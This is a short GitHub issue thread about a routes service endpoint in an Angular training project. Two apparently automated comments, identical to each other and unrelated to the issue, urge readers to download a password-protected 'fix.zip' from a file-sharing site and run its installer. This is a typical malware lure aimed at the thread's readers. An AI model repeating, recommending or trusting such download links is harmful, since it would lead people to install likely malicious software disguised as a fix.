### ISSUE TITLE
Routes service

### ISSUE THREAD

**Issue by siviavio4ka** [emp74ark/rss-angular-train#40]
Endpoint: /api/route

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
